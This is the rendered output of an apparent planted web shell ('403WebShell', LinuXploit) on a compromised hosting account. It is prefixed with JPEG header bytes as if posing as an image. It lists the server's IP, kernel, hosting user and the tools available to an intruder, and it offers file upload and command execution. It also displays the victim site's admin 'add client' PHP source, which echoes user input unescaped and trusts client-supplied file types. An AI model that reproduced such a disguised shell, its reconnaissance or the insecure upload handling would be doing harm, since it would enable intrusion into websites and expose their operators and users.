����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 3.137.211.49
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/bm1holdings-ltd.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/kwacuqig/bm1holdings-ltd.com/add-client.php
<?php
session_start();
include './header.php';
include './assets/php/connect.php';
include './assets/php/filterFile.php';
include './assets/php/compress-image.php';

if (!loggedin()) {
    header('location:./login');
}
?>

<div class="breadcrumbs">
    <div class="container">
        <div class="row">
            <div class="col-12">
                <div class="bread-inner">
                    <ul class="bread-list">
                        <li><a href="home">Home<i class="ti-arrow-right"></i></a></li>
                        <li class="active"><a href="add-team">Add Client</a></li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</div>
<?php
if (isset($_POST['submit'])) {
    $image_name = strtolower($_FILES['image']['name']);
    $image_type = $_FILES['image']['type'];
    $image_size = $_FILES['image']['size'];
    $image_tmp_name = $_FILES['image']['tmp_name'];

    switch ($image_type) {
        case 'image/png':
            $extension = ".png";
            break;
        case 'image/jpg':
            $extension = ".jpg";
            break;
        case 'image/jpeg':
            $extension = ".jpg";
            break;
        case 'image/gif':
            $extension = ".gif";
        default:
            $extension = ".jpg";
    }

    $name = mysqli_real_escape_string($conn, $_POST['name']);
    $biography = mysqli_real_escape_string($conn, htmlentities($_POST['biography']));
    $location = mysqli_real_escape_string($conn, htmlentities($_POST['location']));

    $_SESSION['name'] = $name;
    $_SESSION['biography'] = $biography;
    $_SESSION['location'] = $location;

    //new image name with its particular extension
    $image_new_name = filter_file($name . '-' . date('Ymd-His') . $extension);

    $path = './assets/clients/';

    //checking if file to be uploaded is an image
    if ($image_type == 'image/JPG' || $image_type == 'image/jpeg' || $image_type == 'image/png' || $image_type == 'image/jpg') {
        //checking if both audio and image are uploaded
        if (compressImage($image_tmp_name, $path . $image_new_name, 50)) {
            $sql = "INSERT INTO `clients`(`image`,`name`,`biography`,`location`) VALUES('$image_new_name','$name','$biography','$location')";
            //checking if the query has run successfully
            if (mysqli_query($conn, $sql)) {
                unset($_SESSION['name'], $_SESSION['role'], $_SESSION['biography'], $_SESSION['location']);
?>
                <script type="text/javascript">
                    swal("SUCCESS", "<?php echo $name; ?> was successfully added to clients", "success");
                </script>
            <?php
            } else {
                die(mysqli_error($conn));
            }
        } else {
            ?>
            <script type="text/javascript">
                swal("ERROR", "Failed to upload client", "error");
            </script>
        <?php
        }
    } else {
        ?>
        <script type="text/javascript">
            swal("ERROR", "<?php echo $image_new_name; ?> is not an image", "error");
        </script>
<?php
    }
}
?>
<section class="shop section">
    <div class="container">
        <div class="row">
            <div class="col-lg-3 mb-4">
                <div class="account-sidebar">
                    <div class="sidebar-list">
                        <a href="client-list"><i class="far fa-handshake"></i> Clients</a>
                        <a href="add-client" class="active"><i class="far fa-upload"></i> Add New Client</a>
                        <a href="logout"><i class="far fa-lock"></i> Logout</a>
                    </div>
                </div>
            </div>
            <div class="col-lg-9">
                <div class="account-content bg-white pt-0">
                    <h4 class="account-content-title"><i class="far fa-handshake"></i> Add Client</h4>
                    <div class="edit-profile">
                        <form action="add-client" method="POST" enctype="multipart/form-data">
                            <div class="row">
                                <div class="col-lg-6">
                                    <div class="mb-3">
                                        <label for="thumbnail" class="form-label">Client Photo</label>
                                        <input type="file" name="image" id="thumbnail" accept="image/*" required>
                                    </div>
                                </div>
                                <div class="col-12">
                                    <div class="mb-3">
                                        <label for="name" class="form-label">Client Name</label>
                                        <input type="text" name="name" class="form-control" id="name" value="<?php echo isset($_SESSION['name']) ? $_SESSION['name'] : '' ?>" required>
                                    </div>
                                </div>
                                <div class="col-l2">
                                    <div class="mb-3">
                                        <label for="biography" class="form-label">Client Biography</label>
                                        <textarea class="form-control" name="biography" id="biography" rows="6" required><?php echo isset($_SESSION['biography']) ? $_SESSION['biography'] : '' ?></textarea>
                                    </div>
                                </div>
                                <div class="col-l2">
                                    <div class="mb-3">
                                        <label for="price" class="form-label">Client Location</label>
                                        <input type="text" name="location" class="form-control" id="price" value="<?php echo isset($_SESSION['location']) ? $_SESSION['location'] : '' ?>" required>
                                    </div>
                                </div>
                            </div>
                            <button type="submit" name="submit" class="btn">Save Client</button>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>

<?php
include './footer.php';
include './scripts.php';
?>
<script>
    document.querySelector("title").innerText = "BM 1 HOLDINGS LTD - ADD TEAM";
    document.querySelectorAll(".menu-area ul li")[7].classList.add("active");
    document.querySelectorAll(".slicknav_nav li a")[8].style.color = "blue";
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit